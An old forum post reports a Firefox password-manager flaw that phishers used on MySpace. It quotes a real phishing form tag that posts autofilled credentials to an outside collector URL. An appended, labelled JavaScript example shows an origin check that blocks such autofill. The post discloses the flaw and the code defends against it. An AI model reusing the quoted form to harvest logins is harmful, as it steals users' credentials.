11-22-2006, 11:14 AM
A new bug in Firefox exposes the password manager to phishers on websites:
full bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=360493
This bug helped phishers to compromise MySpace accounts late last month:
Phishers compromise MySpace accounts with fake login form on MySpace's own site
http://community.tuliptools.com/index.ph...667.0.html
Quote:
I was shocked today to find an in-the-wild phish that uses nothing more than
cross-site forms, and also extracts information from the Password Manager!
The underlying method was so obvious that it should have raised multiple
warnings. There were none at all.
It was in a MySpace profile that included this tag:
Code:
<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php"
method="post">
What followed was a nearly perfect-looking MySpace login form that used simple
HTML and absolute positioning.
Not only did Firefox fail to raise a warning, it auto-filled my www.myspace.com
username and password into this form!! I hope anyone reading this realizes it
is a security failure for the browser to auto-fill the membres.lycos.fr form
with credentials from another website...
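The check the report says was missing, as an added example (not part of the original post and not Firefox's code): before filling, resolve the form's action against the page URL and refuse when the submit target leaves the origin the login was saved for. The profile URL, the saved-login object and the function names are assumptions made for illustration.

```javascript
// Added example: origin check a password manager can apply before autofill.
// Function names, the saved-login shape and the profile URL are hypothetical.

// Resolve a form's action against the page URL and return the origin the
// form will submit to. An empty or missing action submits to the page itself.
function submitOrigin(pageUrl, action) {
  return new URL(action || pageUrl, pageUrl).origin;
}

// Decide whether a saved login may be filled into a form.
// saved.origin is the origin the credential was stored for.
function autofillDecision(saved, pageUrl, formAction) {
  let pageOrigin, actionOrigin;
  try {
    pageOrigin = new URL(pageUrl).origin;
    actionOrigin = submitOrigin(pageUrl, formAction);
  } catch (e) {
    return { fill: false, reason: "unparseable URL" };
  }
  if (pageOrigin !== saved.origin) {
    return { fill: false, reason: "page origin differs from saved login" };
  }
  // The case in the report: the page is on the saved site, but the form
  // posts the filled values to another host.
  if (actionOrigin !== saved.origin) {
    return { fill: false, reason: `form submits to ${actionOrigin}` };
  }
  return { fill: true, reason: "page and submit target match saved login" };
}

// Constructed sample input: a login saved for the site, a profile page on it.
const SAVED = { origin: "http://www.myspace.com", username: "sample-user" };
const PROFILE = "http://www.myspace.com/sample-profile";
const ACTIONS = [
  "http://membres.lycos.fr/adel88duran/plaguedoctor.php", // tag from the report
  "/login",                                               // same-site, relative
  "",                                                     // posts back to page
];

for (const action of ACTIONS) {
  const d = autofillDecision(SAVED, PROFILE, action);
  console.log(JSON.stringify(action), "->", d.fill ? "fill" : "refuse", `(${d.reason})`);
}
```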